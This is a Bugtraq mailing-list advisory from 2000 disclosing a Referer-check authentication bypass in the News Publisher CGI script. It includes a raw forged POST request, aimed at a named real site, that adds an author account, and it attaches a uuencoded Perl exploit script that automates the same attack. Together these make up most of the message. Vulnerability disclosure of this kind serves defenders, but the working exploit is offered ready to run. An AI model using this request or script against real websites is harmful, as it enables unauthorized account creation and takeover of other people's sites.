[16449] in bugtraq
News Publisher CGI Vulnerability
daemon@ATHENA.MIT.EDU (n30)
Wed Aug 30 17:29:01 2000
Message-Id: <003301c0123b$18f8c1a0$953b29d4@e8s9s4>
Date: Tue, 29 Aug 2000 21:30:09 -0700
Reply-To: n30 <n30@CGI-EXPERTS.COM>
From: n30 <n30@CGI-EXPERTS.COM>
X-To: gov-boi@hack.co.za, submissions@packetstorm.securify.com,
trib@alldas.de
To: BUGTRAQ@SECURITYFOCUS.COM
Product: News Publisher
Versions: Tested v1.05, 1.05a, 1.05b and 1.06 (newest)
OS: Unix and Winnt
Vendor: Notified
Web Site: www.gwscripts.com
The Problem,
yet again CGI authors use nested IF statements to decide what
action to take upon and incoming request. This time the problem allows ppl
to add and author into the 'authors.file' file. This can't be done through a
web browser since the script assumes that if the HTTP_REFERER field is
the url of the news.cgi script (the main script) then you must have completed
the login process :). This assumtion would be true if you were to use a browser
but.... its easily fixed using netcat therefore by passing this raw HTTP request:
POST /cgi-bin/news/news.cgi?addAuthor HTTP/1.0
Connection: close
User-Agent: n30/browser
Host: www.speedy3d.com
Referer: http://www.speedy3d.com/cgi-bin/news/news.cgi
Content-type: application/x-www-form-urlencoded
Content-length: 71
author=n30&apassword=teapot&email=don@know.com&name=n30&password=teapot
it is possible to add an author.
Exploit,
I have included a perl script that will add a user into the authors.file
for you with username: kid and the passwerd of your choice.
Patch,
I suspect it will be very quick in arriving..
Extra,
This is a real problem since on older versions the author.file was readable
with Unix crypt passes, this hole sorta blows that outta the water!. There are many
sitez using this script and some would probably be regarded as large. Therefore
i must ask you NOT to misuse the exploit script. thanx....
n30
n30@alldas.de
begin 666 newpub-xploit.pl
M(R$O=7-R+V)I;B]P97)L#0HC(" -"B,@3F5W<R!0=6)L:7-H97(@15A03$])
M5"!B>2!N,S -"B,@5F5R<VEO;G,Z('1E<W1E9"!O;B Q+C U#0HC"0D@(" @
M(" Q+C U80T*(PD)(" @(" @,2XP-6(-"B,@(" @(" @(" @( D@(" @(" Q
M+C V#0HC($)U9R!&;W5N9"!">3H@;64@>VXS,'T-"B,@3U,Z(%5N:7@@86YD
M(%=I;FYT#0HC#0HC(%1H92!0<F]B;&5M.@T*(PE4:&4@875T:&]R(&1E8VED
M960@:6X@86QL(&AI<R G96YL:6=H=&5N960@=VES9&]M)PT*(R!T:&%T(&EF
M('1H92!(5%107U)%1D5215(@=7)L(&ES('1H92!S86UE(&%S('1H92!.97=S
M(%!U8FQI<VAE<@T*(R!N97=S+F-G:2!F:6QE+B!4:&5N(%4@:&%V92!/0E9)
M3U533%D@;&]G9V5D(&EN/PT*(PT*(R!%>'!L;VET.@T*(PEH;6UM(&UE('1H
M:6YK<R!I('-H;W5L9"!C:&%N9V4@=&AE($A45%!?4D5&15)%4B!T;SH-"B,-
M"B,):'1T<#HO+W=W=RYS97)V97(N8V]M+V-G:2]N97=S+F-G:0T*(PT*(PE5
M<VEN9R!T:&ES(&5X<&QO:70@=VEL;"!A9&0@86X@875T:&]R(&%C8V]U;G0@
M=VET:"!U<V5R(&MI9 T*(PEA;F0@<&%S<W=E<F0@;V8@=7(@8VAO:6-E+@T*
M(PT*(R!.3U1%.B!4:&5R92!A<F4@;6]R92!I;G9E;G1I=F4@=V%Y<R!T;R!U
M<V4@=&AI<R!6=6QN97)A8FEL:71Y(#HI#0HC"6EE+B!M87EB93\_('1H92!!
M9&UI;B!S8W)E96X@:7,@<')O=&5C=&5D(&)Y('1H92!(5%107U)%1D5215(_
M#0HC#0HC(&XS,$!A;&QD87,N9&4-"B,@=W=W+F%L;&1A<RYD92P@9&5F86-E
M9"YA;&QD87,N9&4@>W1R:6(G<R!T:&4@=V5B;6%S=&5R(&YO="!M92%]#0HC
M#0HC(%-H;W5T>CH@=')I8BP@87AE<W,L(&1O;7HL(&%C:61F;&%M92P@<F%X
M:64L("!A;F0@86QL('=H;R!K;F]W(&UE(0T*(PT*#0IU<V4@<W1R:6-T.PT*
M=7-E(%-O8VME=#L-"@T*<')I;G0H(EQN3F5W<R!0=6)L:7-H97(@15A03$])
M5%QN(BD[#0IP<FEN="@B0GDZ(&XS,"![;C,P7$!A;&QD87,N9&5]7&XB*3L-
M"G!R:6YT*")<;E-H;W5T>CH@=')I8BP@87AE<W,L(&1O;7HL(&%C:61F;&%M
M92P@<F%X:65<;B(I.PT*#0II9B H0$%21U8@/" S*2![#0H@(" @<')I;G0H
M(EQN57-A9V4Z("0P(#QT87)G970^(#QD:7(^(#QN97=P87-S/EQN(BD[#0H@
M(" @<')I;G0H(EQN(" @96<@/3X@+B]S<&QO:70N<&P@=W=W+F5X86UP;&4N
M8V]M(&-G:2UB:6XO;F5W<RYC9VD@:6ES86QA;65R7&XB*3L-"B @("!E>&ET
M*#$I.PT*?0T*#0HH;7D@)'1A<F=E="QM>2 D9&ER+&UY("1N97=P87-S*2 ]
M($!!4D=6.PT*#0HC(%-E='5P($-O;G1E;G0M3&5N9W1H($AE861E<B Z*0T*
M;7D@)&QE;F=T:" ](#8X("L@*#(@*B!L96YG=&@H)&YE=W!A<W,I*3L-"@T*
M(R!0<FEN="!"=6QL4VAI= T*<')I;G0H(EQN4F5M;W1E(&AO<W0Z("1T87)G
M971<;B(I.PT*<')I;G0H(D-'22US8W)I<'0Z("1D:7)<;B(I.PT*<')I;G0H
M(E523#H@:'1T<#HO+R1T87)G970O)&1I<EQN(BD[#0H-"B,@4V5T=7 @55),
M($-O;6UA;F0-"FUY("1U<FP@/2 B875T:&]R/6MI9"9A<&%S<W=O<F0])&YE
M=W!A<W,F96UA:6P];&%M97)Z7$!A;G1I;VYL:6YE+F-O;29N86UE/6MI9"9P
M87-S=V]R9#TD;F5W<&%S<R([#0IP<FEN="@B55),($-O;6UA;F0Z("1U<FQ<
M;B(I.PT*(R!.96-E<W-A<GD@=&\@1$4M2VED9&EE(&1A('=E<FQD(#HI#0IM
M>2 D86=E;G0@/2 B+3U!='1E;G1I;VX@061M:6X]+2!P3'H@;C!T92!D,'=N
M('1H,7,@25 @86YD(% T<W,@;VYT,"!F0FDB.PT*#0IM>2 D<W!L;VET/0T*
M(E!/4U0@+R1D:7(_861D075T:&]R($A45% O,2XP#0I#;VYN96-T:6]N.B!C
M;&]S90T*57-E<BU!9V5N=#H@)&%G96YT#0I(;W-T.B D=&%R9V5T#0I2969E
M<F5R.B!H='1P.B\O)'1A<F=E="\D9&ER#0I#;VYT96YT+71Y<&4Z(&%P<&QI
M8V%T:6]N+W@M=W=W+69O<FTM=7)L96YC;V1E9 T*0V]N=&5N="UL96YG=&@Z
M("1L96YG=&@-"@T*)'5R;"([#0H-"FUY("1I861D<B ](&EN971?871O;B@D
M=&%R9V5T*2 @(" @(" @(" @(" @(" @(" @('Q\(&1I92@B17)R;W(Z("0A
M7&XB*3L-"FUY("1P861D<B ]('-O8VMA9&1R7VEN*#@P+" D:6%D9'(I(" @
M(" @(" @(" @(" @('Q\(&1I92@B17)R;W(Z("0A7&XB*3L-"FUY("1P<F]T
M;R ](&=E='!R;W1O8GEN86UE*"=T8W G*2 @(" @(" @(" @(" @(" @('Q\
M(&1I92@B17)R;W(Z("0A7&XB*3L-"@T*<V]C:V5T*%-/0TM%5"P@4$9?24Y%
M5"P@4T]#2U]35%)%04TL("1P<F]T;RD@(" @?'P@9&EE*")%<G)O<CH@)"%<
M;B(I.PT*8V]N;F5C="A33T-+150L("1P861D<BD@(" @(" @(" @(" @(" @
M(" @(" @(" @?'P@9&EE*")%<G)O<CH@)"%<;B(I.PT*<V5N9"A33T-+150L
M(B1S<&QO:71<,#$U7# Q,B(L(# I(" @(" @(" @(" @(" @?'P@9&EE*")%
M<G)O<CH@)"%<;B(I.PT*8VQO<V4H4T]#2T54*3L-"@T*<')I;G0H(EQN5V@P
M82!C:&5X,'(Z(&AT=' Z+R\D=&%R9V5T+R1D:7)<;G5S97(O<&%S<SH@:VED
:+R1N97=P87-S7&XB*3L-"@T*97AI="@P*3L`
`
end
